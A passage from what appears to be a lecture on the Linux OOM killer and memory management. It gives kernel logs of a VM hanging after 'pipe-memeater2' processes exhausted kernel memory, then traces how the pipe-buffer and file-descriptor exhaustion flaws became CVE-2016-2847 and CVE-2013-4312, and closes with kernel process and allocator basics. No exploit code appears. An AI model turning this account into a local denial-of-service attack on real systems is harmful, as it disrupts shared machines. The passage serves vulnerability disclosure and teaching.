[   78.939164] [  786]     0   786    50842      115      39        0             0 gssproxy
[   78.940651] [  794]     0   794    28812       62      11        0             0 ksmtuned
[   78.942134] [  796]    32   796    16227      131      33        0             0 rpcbind
[   78.943603] [  806]    70   806     7518       59      19        0             0 avahi-daemon
[   78.945148] [  818]   999   818   132797     2567      53        0             0 polkitd
[   78.946618] [  882]     0   882   113615      480      72        0             0 NetworkManager
[   78.948203] [ 1010]     0  1010    13266      145      29        0             0 wpa_supplicant
[   78.949779] [ 1200]     0  1200    27631     3114      54        0             0 dhclient
[   78.951271] [ 1410]     0  1410    20640      213      44        0         -1000 sshd
[   78.952692] [ 1413]     0  1413   138261     2651      86        0             0 tuned
[   78.954129] [ 1416]     0  1416   138875     1130     139        0             0 libvirtd
[   78.955621] [ 1424]     0  1424    31583      151      17        0             0 crond
[   78.957092] [ 1425]     0  1425   118308      753      50        0             0 gdm
[   78.958480] [ 1456]     0  1456     6491       49      17        0             0 atd
[   78.959869] [ 1462]     0  1462    27509       33      11        0             0 agetty
[   78.961291] [ 2488]     0  2488    55958     1573      97        0             0 Xorg
[   78.962720] [ 2575]     0  2575    23306      254      44        0             0 master
[   78.964156] [ 2576]    89  2576    23332      251      46        0             0 pickup
[   78.965583] [ 2577]    89  2577    23349      252      46        0             0 qmgr
[   78.967190] [ 2583]     0  2583    64751      482      57        0          -900 abrt-dbus
[   78.968691] [ 2705]    99  2705     3888       48      11        0             0 dnsmasq
[   78.970167] [ 2706]     0  2706     3881       45      11        0             0 dnsmasq
[   78.971646] [ 2712]     0  2712    89025      249      61        0             0 gdm-session-wor
[   78.973250] [ 2715]    42  2715   140687      403     102        0             0 gnome-session
[   78.974809] [ 2718]    42  2718     3488       36      11        0             0 dbus-launch
[   78.976354] [ 2719]    42  2719     7342      186      17        0             0 dbus-daemon
[   78.977884] [ 2722]    42  2722    85002      155      34        0             0 at-spi-bus-laun
[   78.979483] [ 2728]    42  2728     7168       89      19        0             0 dbus-daemon
[   78.981023] [ 2731]    42  2731    32423      158      34        0             0 at-spi2-registr
[   78.982629] [ 2743]    42  2743   272885     1577     182        0             0 gnome-settings-
[   78.984229] [ 2750]     0  2750    90874      321      61        0             0 upowerd
[   78.985703] [ 2754]    42  2754    76643      143      37        0             0 gvfsd
[   78.987663] [ 2758]    42  2758    73901      174      42        0             0 gvfsd-fuse
[   78.989159] [ 2770]    42  2770   387894    17240     291        0             0 gnome-shell
[   78.990669] [ 2771]   997  2771   101041      373      50        0             0 colord
[   78.992139] [ 2780]    42  2780   111507      295      75        0             0 pulseaudio
[   78.993661] [ 2801]    42  2801    45167      108      25        0             0 dconf-service
[   78.995198] [ 2806]    42  2806   117500      533      47        0             0 ibus-daemon
[   78.996834] [ 2811]    42  2811    98221      686      46        0             0 ibus-dconf
[   78.998353] [ 2813]    42  2813   117506      551     113        0             0 ibus-x11
[   78.999851] [ 2820]    42  2820    98935      402      61        0             0 mission-control
[   79.001442] [ 2822]    42  2822   143741      459      94        0             0 caribou
[   79.002912] [ 2826]     0  2826   101278      258      52        0             0 packagekitd
[   79.006211] [ 2832]    42  2832   178354     1594     141        0             0 goa-daemon
[   79.007731] [ 2867]    42  2867   100148      250      47        0             0 gvfs-udisks2-vo
[   79.009329] [ 2871]     0  2871    92703      782      44        0             0 udisksd
[   79.010795] [ 2878]    42  2878    83626      371      91        0             0 goa-identity-se
[   79.012404] [ 2889]    42  2889   105443      307      58        0             0 gvfs-afc-volume
[   79.014295] [ 2894]    42  2894    78121      168      38        0             0 gvfs-mtp-volume
[   79.015865] [ 2898]    42  2898    74934      137      33        0             0 gvfs-goa-volume
[   79.017473] [ 2902]    42  2902    80390      182      43        0             0 gvfs-gphoto2-vo
[   79.019042] [ 2914]     0  2914    80155      236      57        0          -900 realmd
[   79.020472] [ 2922]    42  2922    79800      679      42        0             0 ibus-engine-sim
[   79.022074] [ 2976]     0  2976    36375      328      73        0             0 sshd
[   79.023483] [ 2980]  1000  2980    36408      326      70        0             0 sshd
[   79.024879] [ 2982]  1000  2982    29142      391      14        0             0 bash
[   79.026277] [ 3075]     0  3075    26974       23      10        0             0 sleep
[   79.027729] [ 3077]  1000  3077     1042       20       7        0             1 pipe-memeater2
[   79.029291] [ 3078]  1000  3078     1042       20       7        0             1 pipe-memeater2
[   79.030897] [ 3079]  1000  3079     1042       20       7        0             1 pipe-memeater2
[   79.032489] [ 3080]  1000  3080     1042       20       7        0             1 pipe-memeater2
[   79.034042] [ 3081]  1000  3081     1042       20       7        0             1 pipe-memeater2
[   79.035603] [ 3082]  1000  3082     1042       20       7        0             1 pipe-memeater2
[   79.037158] [ 3083]  1000  3083     1042       20       7        0             1 pipe-memeater2
[   79.038752] [ 3084]  1000  3084     1042       20       7        0             1 pipe-memeater2
[   79.040301] [ 3085]  1000  3085     1042       20       7        0             1 pipe-memeater2
[   79.041855] [ 3086]  1000  3086     1042       20       7        0             1 pipe-memeater2
[   79.043438] [ 3088]  1000  3088     1042       20       7        0             0 pipe-memeater2
[   79.045025] Out of memory: Kill process 2770 (gnome-shell) score 37 or sacrifice child
[   79.046466] Killed process 2806 (ibus-daemon) total-vm:470000kB, anon-rss:2128kB, file-rss:4kB
(Omitting repetitions)
[  119.938777] pipe-memeater2 invoked oom-killer: gfp_mask=0x200d2, order=0, oom_score_adj=0
[  119.940307] pipe-memeater2 cpuset=/ mems_allowed=0
[  119.941199] CPU: 0 PID: 3088 Comm: pipe-memeater2 Not tainted 3.10.0-123.el7.x86_64 #1
[  119.942645] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013
[  119.944575]  ffff88005f302d80 000000005d69c4df ffff88005f3ada78 ffffffff815e19ba
[  119.946897]  ffff88005f3adb08 ffffffff815dd02d ffffffff810b68f8 ffff8800666dde50
[  119.948528]  0000000000000202 ffff88005f302d80 ffff88005f3adaf0 ffffffff81102eff
[  119.949989] Call Trace:
[  119.950466]  [<ffffffff815e19ba>] dump_stack+0x19/0x1b
[  119.951424]  [<ffffffff815dd02d>] dump_header+0x8e/0x214
[  119.952398]  [<ffffffff810b68f8>] ? ktime_get_ts+0x48/0xe0
[  119.953413]  [<ffffffff81102eff>] ? delayacct_end+0x8f/0xb0
[  119.954435]  [<ffffffff8114520e>] oom_kill_process+0x24e/0x3b0
[  119.955514]  [<ffffffff81144d76>] ? find_lock_task_mm+0x56/0xc0
[  119.956799]  [<ffffffff8106af3e>] ? has_capability_noaudit+0x1e/0x30
[  119.957985]  [<ffffffff81145a36>] out_of_memory+0x4b6/0x4f0
[  119.958997]  [<ffffffff8114b579>] __alloc_pages_nodemask+0xa09/0xb10
[  119.960145]  [<ffffffff81188779>] alloc_pages_current+0xa9/0x170
[  119.961223]  [<ffffffff811b8954>] pipe_write+0x274/0x540
[  119.962186]  [<ffffffff811af36d>] do_sync_write+0x8d/0xd0
[  119.963159]  [<ffffffff811afb0d>] vfs_write+0xbd/0x1e0
[  119.964094]  [<ffffffff811b0558>] SyS_write+0x58/0xb0
[  119.965014]  [<ffffffff815f2119>] system_call_fastpath+0x16/0x1b
[  119.966102] Mem-Info:
[  119.966528] Node 0 DMA per-cpu:
[  119.967138] CPU    0: hi:    0, btch:   1 usd:   0
[  119.968216] CPU    1: hi:    0, btch:   1 usd:   0
[  119.969247] CPU    2: hi:    0, btch:   1 usd:   0
[  119.970408] CPU    3: hi:    0, btch:   1 usd:   0
[  119.971436] Node 0 DMA32 per-cpu:
[  119.972147] CPU    0: hi:  186, btch:  31 usd:   0
[  119.973018] CPU    1: hi:  186, btch:  31 usd:  30
[  119.973883] CPU    2: hi:  186, btch:  31 usd:  41
[  119.974748] CPU    3: hi:  186, btch:  31 usd:  22
[  119.975626] active_anon:3798 inactive_anon:1649 isolated_anon:0
[  119.975626]  active_file:4 inactive_file:198 isolated_file:0
[  119.975626]  unevictable:0 dirty:0 writeback:0 unstable:0
[  119.975626]  free:13047 slab_reclaimable:4692 slab_unreclaimable:7148
[  119.975626]  mapped:0 shmem:2260 pagetables:530 bounce:0
[  119.975626]  free_cma:0
[  119.981153] Node 0 DMA free:7632kB min:384kB low:480kB high:576kB active_anon:128kB inactive_anon:104kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:124kB slab_reclaimable:152kB slab_unreclaimable:356kB kernel_stack:0kB pagetables:8kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes
[  119.988478] lowmem_reserve[]: 0 1802 1802 1802
[  119.989412] Node 0 DMA32 free:44612kB min:44668kB low:55832kB high:67000kB active_anon:15064kB inactive_anon:6492kB active_file:16kB inactive_file:376kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1845300kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:8916kB slab_reclaimable:18616kB slab_unreclaimable:28236kB kernel_stack:3608kB pagetables:2112kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:223 all_unreclaimable? yes
[  119.996991] lowmem_reserve[]: 0 0 0 0
[  119.997797] Node 0 DMA: 2*4kB (UM) 8*8kB (UM) 10*16kB (M) 11*32kB (UM) 11*64kB (UM) 11*128kB (UM) 5*256kB (UM) 1*512kB (U) 1*1024kB (M) 1*2048kB (R) 0*4096kB = 7560kB
[  120.002259] Node 0 DMA32: 1143*4kB (EM) 966*8kB (UEM) 491*16kB (EM) 345*32kB (UEM) 102*64kB (EM) 23*128kB (UM) 0*256kB 0*512kB 0*1024kB 0*2048kB 1*4096kB (R) = 44764kB
[  120.007208] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[  120.008837] 2506 total pagecache pages
[  120.009721] 0 pages in swap cache
[  120.010395] Swap cache stats: add 0, delete 0, find 0/0
[  120.011755] Free swap  = 0kB
[  120.012363] Total swap = 0kB
[  120.016138] 524287 pages RAM
[  120.016878] 54799 pages reserved
[  120.017911] 525985 pages shared
[  120.018652] 454436 pages non-shared
[  120.019391] [ pid ]   uid  tgid total_vm      rss nr_ptes swapents oom_score_adj name
[  120.021231] [  590]     0   590    29620       80      26        0             0 lvmetad
[  120.023399] [  612]     0   612    10995      330      21        0         -1000 systemd-udevd
[  120.025409] [  704]     0   704    12797       95      23        0         -1000 auditd
[  120.027072] [  717]     0   717    20056       28       9        0             0 audispd
[  120.029071] [  726]     0   726     4189       43      13        0             0 alsactl
[  120.031114] [  729]     0   729     6600       80      17        0             0 systemd-logind
[  120.032827] [  730]     0   730     1094       25       8        0             0 rngd
[  120.034420] [  732]     0   732     6551       49      19        0             0 sedispatch
[  120.036194] [  736]    81   736     7419      337      18        0          -900 dbus-daemon
[  120.037949] [  745]   995   745     2133       37       9        0             0 lsmd
[  120.039411] [  748]     0   748     4829       78      12        0             0 irqbalance
[  120.041107] [  770]   172   770    41164       53      16        0             0 rtkit-daemon
[  120.042884] [  781]    70   781     7549       76      21        0             0 avahi-daemon
[  120.045308] [  794]     0   794    28812       62      11        0             0 ksmtuned
[  120.047005] [  806]    70   806     7518       59      19        0             0 avahi-daemon
[  120.048535] [ 1410]     0  1410    20640      213      44        0         -1000 sshd
[  120.049944] [ 1456]     0  1456     6491       49      17        0             0 atd
[  120.051333] [ 1462]     0  1462    27509       33      11        0             0 agetty
[  120.052764] [ 2583]     0  2583    64751      493      57        0          -900 abrt-dbus
[  120.054299] [ 2705]    99  2705     3888       47      11        0             0 dnsmasq
[  120.056124] [ 2706]     0  2706     3881       45      11        0             0 dnsmasq
[  120.057652] [ 2914]     0  2914    80155      255      57        0          -900 realmd
[  120.059087] [ 3075]     0  3075    26974       23      10        0             0 sleep
[  120.060508] [ 3088]  1000  3088     1042       20       7        0             0 pipe-memeater2
[  120.062067] [ 3089]     0  3089     2732       32       9        0             0 systemd-cgroups
[  120.063637] [ 3090]     0  3090    19084       33      10        0             0 systemd-cgroups
[  120.065210] [ 3091]     0  3091    19084       33       9        0             0 systemd-cgroups
[  120.066939] [ 3092]     0  3092     2719       27       9        0             0 systemd-cgroups
[  120.069145] Out of memory: Kill process 590 (lvmetad) score 0 or sacrifice child
[  120.071126] Killed process 590 (lvmetad) total-vm:118480kB, anon-rss:320kB, file-rss:0kB
( I pressed SysRq-m in order to display memory information, for the system was still not responding. )
[  209.378474] SysRq : Show Memory
[  209.379117] Mem-Info:
[  209.379560] Node 0 DMA per-cpu:
[  209.380184] CPU    0: hi:    0, btch:   1 usd:   0
[  209.381073] CPU    1: hi:    0, btch:   1 usd:   0
[  209.381968] CPU    2: hi:    0, btch:   1 usd:   0
[  209.382852] CPU    3: hi:    0, btch:   1 usd:   0
[  209.383736] Node 0 DMA32 per-cpu:
[  209.384383] CPU    0: hi:  186, btch:  31 usd:  91
[  209.385281] CPU    1: hi:  186, btch:  31 usd:  53
[  209.386171] CPU    2: hi:  186, btch:  31 usd:  92
[  209.387054] CPU    3: hi:  186, btch:  31 usd: 138
[  209.387947] active_anon:3716 inactive_anon:1649 isolated_anon:0
[  209.387947]  active_file:28 inactive_file:8 isolated_file:0
[  209.387947]  unevictable:0 dirty:0 writeback:0 unstable:0
[  209.387947]  free:12757 slab_reclaimable:4692 slab_unreclaimable:7146
[  209.387947]  mapped:68 shmem:2260 pagetables:504 bounce:0
[  209.387947]  free_cma:0
[  209.393582] Node 0 DMA free:7592kB min:384kB low:480kB high:576kB active_anon:128kB inactive_anon:104kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:124kB slab_reclaimable:152kB slab_unreclaimable:356kB kernel_stack:0kB pagetables:8kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes
[  209.400851] lowmem_reserve[]: 0 1802 1802 1802
[  209.401815] Node 0 DMA32 free:43436kB min:44668kB low:55832kB high:67000kB active_anon:14736kB inactive_anon:6492kB active_file:112kB inactive_file:32kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1845300kB mlocked:0kB dirty:0kB writeback:0kB mapped:272kB shmem:8916kB slab_reclaimable:18616kB slab_unreclaimable:28228kB kernel_stack:3608kB pagetables:2008kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:824 all_unreclaimable? yes
[  209.409563] lowmem_reserve[]: 0 0 0 0
[  209.410386] Node 0 DMA: 16*4kB (M) 13*8kB (UM) 10*16kB (M) 11*32kB (UM) 10*64kB (UM) 11*128kB (UM) 5*256kB (UM) 1*512kB (U) 1*1024kB (M) 1*2048kB (R) 0*4096kB = 7592kB
[  209.413721] Node 0 DMA32: 1009*4kB (EM) 937*8kB (EM) 476*16kB (UEM) 345*32kB (UEM) 103*64kB (UEM) 20*128kB (UM) 0*256kB 0*512kB 0*1024kB 0*2048kB 1*4096kB (R) = 43436kB
[  209.416997] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[  209.418540] 2312 total pagecache pages
[  209.419241] 0 pages in swap cache
[  209.419859] Swap cache stats: add 0, delete 0, find 0/0
[  209.420824] Free swap  = 0kB
[  209.421370] Total swap = 0kB
[  209.424943] 524287 pages RAM
[  209.425506] 54799 pages reserved
[  209.426111] 525960 pages shared
[  209.426705] 454446 pages non-shared
( I pressed SysRq-m in order to display memory information, for the system was still not responding. )
[  279.574636] SysRq : Show Memory
[  279.575281] Mem-Info:
[  279.575727] Node 0 DMA per-cpu:
[  279.576351] CPU    0: hi:    0, btch:   1 usd:   0
[  279.577240] CPU    1: hi:    0, btch:   1 usd:   0
[  279.578135] CPU    2: hi:    0, btch:   1 usd:   0
[  279.579025] CPU    3: hi:    0, btch:   1 usd:   0
[  279.579911] Node 0 DMA32 per-cpu:
[  279.580559] CPU    0: hi:  186, btch:  31 usd:  91
[  279.581454] CPU    1: hi:  186, btch:  31 usd:  53
[  279.582342] CPU    2: hi:  186, btch:  31 usd:  92
[  279.583229] CPU    3: hi:  186, btch:  31 usd: 138
[  279.584119] active_anon:3716 inactive_anon:1649 isolated_anon:0
[  279.584119]  active_file:28 inactive_file:8 isolated_file:0
[  279.584119]  unevictable:0 dirty:0 writeback:0 unstable:0
[  279.584119]  free:12757 slab_reclaimable:4692 slab_unreclaimable:7146
[  279.584119]  mapped:68 shmem:2260 pagetables:504 bounce:0
[  279.584119]  free_cma:0
[  279.589776] Node 0 DMA free:7592kB min:384kB low:480kB high:576kB active_anon:128kB inactive_anon:104kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:124kB slab_reclaimable:152kB slab_unreclaimable:356kB kernel_stack:0kB pagetables:8kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes
[  279.597050] lowmem_reserve[]: 0 1802 1802 1802
[  279.598024] Node 0 DMA32 free:43436kB min:44668kB low:55832kB high:67000kB active_anon:14736kB inactive_anon:6492kB active_file:112kB inactive_file:32kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1845300kB mlocked:0kB dirty:0kB writeback:0kB mapped:272kB shmem:8916kB slab_reclaimable:18616kB slab_unreclaimable:28228kB kernel_stack:3608kB pagetables:2008kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:824 all_unreclaimable? yes
[  279.605826] lowmem_reserve[]: 0 0 0 0
[  279.606659] Node 0 DMA: 16*4kB (M) 13*8kB (UM) 10*16kB (M) 11*32kB (UM) 10*64kB (UM) 11*128kB (UM) 5*256kB (UM) 1*512kB (U) 1*1024kB (M) 1*2048kB (R) 0*4096kB = 7592kB
[  279.610016] Node 0 DMA32: 1009*4kB (EM) 937*8kB (EM) 476*16kB (UEM) 345*32kB (UEM) 103*64kB (UEM) 20*128kB (UM) 0*256kB 0*512kB 0*1024kB 0*2048kB 1*4096kB (R) = 43436kB
[  279.613298] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[  279.614840] 2312 total pagecache pages
[  279.615539] 0 pages in swap cache
[  279.616166] Swap cache stats: add 0, delete 0, find 0/0
[  279.617134] Free swap  = 0kB
[  279.617676] Total swap = 0kB
[  279.621228] 524287 pages RAM
[  279.622185] 54799 pages reserved
[  279.622791] 525928 pages shared
[  279.623369] 454446 pages non-shared
( I pressed SysRq-f in order to invoke OOM killer, for OOM killer is not invoked automatically despite DMA32's free: is already below min: watermark. )
[  297.411498] SysRq : Manual OOM execution
[  297.412450] kworker/0:2 invoked oom-killer: gfp_mask=0xd0, order=0, oom_score_adj=0
[  297.413837] kworker/0:2 cpuset=/ mems_allowed=0
[  297.414701] CPU: 0 PID: 297 Comm: kworker/0:2 Not tainted 3.10.0-123.el7.x86_64 #1
[  297.416070] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013
[  297.418031] Workqueue: events moom_callback
[  297.418817]  ffff880036ebc440 00000000d84a44d3 ffff880036a3fc70 ffffffff815e19ba
[  297.420273]  ffff880036a3fd00 ffffffff815dd02d ffff880036a3fe04 ffff880036a407d0
[  297.421755]  ffff88003689c000 0000000000000004 ffff880036a3fcc8 0000000200000000
[  297.423197] Call Trace:
[  297.423670]  [<ffffffff815e19ba>] dump_stack+0x19/0x1b
[  297.424601]  [<ffffffff815dd02d>] dump_header+0x8e/0x214
[  297.425571]  [<ffffffff8114520e>] oom_kill_process+0x24e/0x3b0
[  297.426639]  [<ffffffff81144d76>] ? find_lock_task_mm+0x56/0xc0
[  297.427744]  [<ffffffff8106af3e>] ? has_capability_noaudit+0x1e/0x30
[  297.428889]  [<ffffffff81145a36>] out_of_memory+0x4b6/0x4f0
[  297.429921]  [<ffffffff8137bc3d>] moom_callback+0x4d/0x50
[  297.430904]  [<ffffffff8107e02b>] process_one_work+0x17b/0x460
[  297.431989]  [<ffffffff8107edfb>] worker_thread+0x11b/0x400
[  297.433040]  [<ffffffff8107ece0>] ? rescuer_thread+0x400/0x400
[  297.434092]  [<ffffffff81085aef>] kthread+0xcf/0xe0
[  297.434981]  [<ffffffff81085a20>] ? kthread_create_on_node+0x140/0x140
[  297.436168]  [<ffffffff815f206c>] ret_from_fork+0x7c/0xb0
[  297.437257]  [<ffffffff81085a20>] ? kthread_create_on_node+0x140/0x140
[  297.438461] Mem-Info:
[  297.438896] Node 0 DMA per-cpu:
[  297.439510] CPU    0: hi:    0, btch:   1 usd:   0
[  297.440405] CPU    1: hi:    0, btch:   1 usd:   0
[  297.441288] CPU    2: hi:    0, btch:   1 usd:   0
[  297.442171] CPU    3: hi:    0, btch:   1 usd:   0
[  297.443056] Node 0 DMA32 per-cpu:
[  297.443701] CPU    0: hi:  186, btch:  31 usd:  91
[  297.444590] CPU    1: hi:  186, btch:  31 usd:  53
[  297.445473] CPU    2: hi:  186, btch:  31 usd:  92
[  297.446358] CPU    3: hi:  186, btch:  31 usd: 138
[  297.447242] active_anon:3716 inactive_anon:1649 isolated_anon:0
[  297.447242]  active_file:28 inactive_file:8 isolated_file:0
[  297.447242]  unevictable:0 dirty:0 writeback:0 unstable:0
[  297.447242]  free:12757 slab_reclaimable:4692 slab_unreclaimable:7146
[  297.447242]  mapped:68 shmem:2260 pagetables:504 bounce:0
[  297.447242]  free_cma:0
[  297.453048] Node 0 DMA free:7592kB min:384kB low:480kB high:576kB active_anon:128kB inactive_anon:104kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:124kB slab_reclaimable:152kB slab_unreclaimable:356kB kernel_stack:0kB pagetables:8kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes
[  297.460221] lowmem_reserve[]: 0 1802 1802 1802
[  297.461163] Node 0 DMA32 free:43436kB min:44668kB low:55832kB high:67000kB active_anon:14736kB inactive_anon:6492kB active_file:112kB inactive_file:32kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1845300kB mlocked:0kB dirty:0kB writeback:0kB mapped:272kB shmem:8916kB slab_reclaimable:18616kB slab_unreclaimable:28228kB kernel_stack:3608kB pagetables:2008kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:824 all_unreclaimable? yes
[  297.469732] lowmem_reserve[]: 0 0 0 0
[  297.470565] Node 0 DMA: 16*4kB (M) 13*8kB (UM) 10*16kB (M) 11*32kB (UM) 10*64kB (UM) 11*128kB (UM) 5*256kB (UM) 1*512kB (U) 1*1024kB (M) 1*2048kB (R) 0*4096kB = 7592kB
[  297.473931] Node 0 DMA32: 1009*4kB (EM) 937*8kB (EM) 476*16kB (UEM) 345*32kB (UEM) 103*64kB (UEM) 20*128kB (UM) 0*256kB 0*512kB 0*1024kB 0*2048kB 1*4096kB (R) = 43436kB
[  297.477216] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[  297.478752] 2312 total pagecache pages
[  297.479453] 0 pages in swap cache
[  297.480080] Swap cache stats: add 0, delete 0, find 0/0
[  297.481058] Free swap  = 0kB
[  297.481596] Total swap = 0kB
[  297.485061] 524287 pages RAM
[  297.485624] 54799 pages reserved
[  297.486234] 525928 pages shared
[  297.486826] 454446 pages non-shared
[  297.487486] [ pid ]   uid  tgid total_vm      rss nr_ptes swapents oom_score_adj name
[  297.488954] [  612]     0   612    10995      330      21        0         -1000 systemd-udevd
[  297.490531] [  704]     0   704    12797       95      23        0         -1000 auditd
[  297.492002] [  717]     0   717    20056       69       9        0             0 audispd
[  297.493481] [  726]     0   726     4189       43      13        0             0 alsactl
[  297.494963] [  729]     0   729     6600       77      17        0             0 systemd-logind
[  297.496545] [  730]     0   730     1094       25       8        0             0 rngd
[  297.497986] [  732]     0   732     6551       49      19        0             0 sedispatch
[  297.499506] [  736]    81   736     7419      337      18        0          -900 dbus-daemon
[  297.501759] [  745]   995   745     2133       37       9        0             0 lsmd
[  297.503207] [  748]     0   748     4829       78      12        0             0 irqbalance
[  297.504741] [  770]   172   770    41164       56      16        0             0 rtkit-daemon
[  297.506298] [  781]    70   781     7549       76      21        0             0 avahi-daemon
[  297.507855] [  794]     0   794    28812       62      11        0             0 ksmtuned
[  297.509361] [  806]    70   806     7518       59      19        0             0 avahi-daemon
[  297.510917] [ 1410]     0  1410    20640      213      44        0         -1000 sshd
[  297.512358] [ 1456]     0  1456     6491       49      17        0             0 atd
[  297.513797] [ 1462]     0  1462    27509       33      11        0             0 agetty
[  297.515266] [ 2583]     0  2583    64751      493      57        0          -900 abrt-dbus
[  297.516777] [ 2705]    99  2705     3888       47      11        0             0 dnsmasq
[  297.518255] [ 2706]     0  2706     3881       45      11        0             0 dnsmasq
[  297.519756] [ 2914]     0  2914    80155      255      57        0          -900 realmd
[  297.521218] [ 3075]     0  3075    26974       23      10        0             0 sleep
[  297.522669] [ 3088]  1000  3088     1042       20       7        0             0 pipe-memeater2
[  297.524263] [ 3089]     0  3089     2732       32       9        0             0 systemd-cgroups
[  297.525861] [ 3090]     0  3090    19084       33      10        0             0 systemd-cgroups
[  297.527466] [ 3091]     0  3091    19084       33       9        0             0 systemd-cgroups
[  297.529070] [ 3092]     0  3092     2719       27       9        0             0 systemd-cgroups
[  297.530666] Out of memory: Kill process 781 (avahi-daemon) score 0 or sacrifice child
[  297.532093] Killed process 806 (avahi-daemon) total-vm:30072kB, anon-rss:236kB, file-rss:0kB
---------- Example output of a hang up after OOM killer is invoked end ----------

At first, I was suspecting that this is a systemd related problem. But it turned out that this problem tends to occur when using xfs.

"Something unexpected is happening?"


2.5 About uninterruptible in-kernel operations

I write "SIGKILL signal cannot be ignored" at OOM killer. But to tell the truth, there are many "procedures which cannot be interrupted when SIGKILL signal is delivered" in the kernel. This is because that since the kernel is a program which controls resources between programs running in userspace and hardware, interrupting as soon as receiving SIGKILL signal can result in inconsistent state.

In order to avoid inconsistent state, there are many "(unkillable) procedures which cannot be interrupted when SIGKILL signal is delivered" in the kernel. But actually, there are also many "(essentially killable) procedures which can be interrupted when SIGKILL signal is delivered, but they remain unkillable in order to simplify procedures by eliminating error handling".


2.6 Then ··· , discussions about this vulnerability at private ML bogged down.

Although I demonstrated that a problematic behavior that a system hangs up using this vulnerability, this vulnerability was not taken seriously, and what I got are responses like "Your system is already DoS attacked and it is too late to recover. Give up and restart your system."

Also, since this vulnerability is considered as a topic which should be discussed in public mailing lists, the discussion moved to public mailing lists on November, 2014.

Since I am not good at doing discussions, I made relevant people angry for many times.


2.7 What did I do for discussions at public ML.

It is not a good thing to post a reproducer program which exploits not yet fixed vulnerabilities in order to demonstrate that the system hangs up in public mailing lists. Also, it is possible that reproducing the hang up using this vulnerability lead to a conditioned response like "Your system is already DoS attacked and it is too late to recover."

Therefore, I posted many reproducer programs developed by trial and error which do not exploit this vulnerability. Also, I put a constraint that a local unprivileged user can reproduce the hang up with finite stress, in order to distinguish that this is different from simple overloading which puts stress forever and to demonstrate that this hang up can occur in actual systems.

But, the discussion spreaded too widely since this attempt discovered too many problems. Therefore, I'd like to explain the ending of this vulnerability.


2.8 The ending of this vulnerability 1

In the end of 2015, patches which mitigates this vulnerability were proposed to public mailing list, and this vulnerability went public. Then, the patches were merged into Linux 4.5 (which was released in March 2016).

But since I gave "Mitigates: CVE-2013-4312 (Linux 2.0+)" tag to both patches posted almost the same time, there was a confusion. As a result, an attack which exhausts all file descriptors using Unix domain sockets (which was discussed without assigning CVE number) became CVE-2013-4312, and an attack which exhausts all kernel memory using pipe's buffers (which was discussed as CVE-2013-4312) became CVE-2016-2847.

Anyway, the file descriptor exhaustion attack was solved, and the kernel memory exhaustion attack was to some degree mitigated.


2.9 The ending of this vulnerability 2

In May 2016, I noticed that a patch for tracking memory for pipe's buffer using kmemcg was (again) posted to public mailing lists. (I didn't notice that the first post was September 2015.)

"Huh? Wasn't memory used for pipe's buffer already tracked using kmemcg since Linux 3.8? We had been discussing this vulnerability based on that assumption."

Thus, I asked the author of the patch and got a reply: "Only memory for pipe's metadata was tracked using kmemcg. Memory for pipe's buffer (anonymous pipe buffer pages) was never tracked until now."

··· Wow! It turned out that the kmemcg which was assumed to be the mitigation of this vulnerability was hardly effective. Therefore, regarding this vulnerability, "unless resources are appropriately restricted using memory cgroup" disclaimer did not hold true.

Now, (finally?) I'd like to get to the main point of this lecture.


Chapter 3   Basic knowledge for understanding the darkness of memory management subsystem


3.1 About process management in Linux

task_struct/thread_info

A data structure for managing processes/threads.
task struct / thread struct

signal_struct

A data structure for managing signals.
signal struct

mm_struct

A data structure for managing memory used by processes which run in userspace.
mm struct

thread and thread group (process)

Single process / single thread
Single process

Multi processes. Can be created by fork().
Multi processes

Honest multi threads. Can be created by clone() with CLONE_VM and CLONE_SIGHAND and CLONE_THREAD.
Honest multi threads

Twisted multi threads. Can be created by clone() with CLONE_VM but without CLONE_SIGHAND.
Twisted multi threads

Kernel threads

Basically does not have mm_struct.
Kernel threads

Workqueues

Queues implemented by kernel threads (for processing works issued by various threads).
Workqueues


3.2 About memory management in Linux

· Using buddy page allocator.

Using "page" which is 4096 bytes as a base, and managing using "order" as index for grouping in the power of 2 sizes like order-0 (for 1 byte to 4096 bytes), order-1 (for 4097 bytes to 8192 bytes), order-2 (for 8193 bytes to 16384 bytes) ···.

There is slab allocator for managing small fixed sized allocation requests, but I don't explain it because it is not important for this lecture.

·There are memories which can track memory usage and which cannot track memory usage.

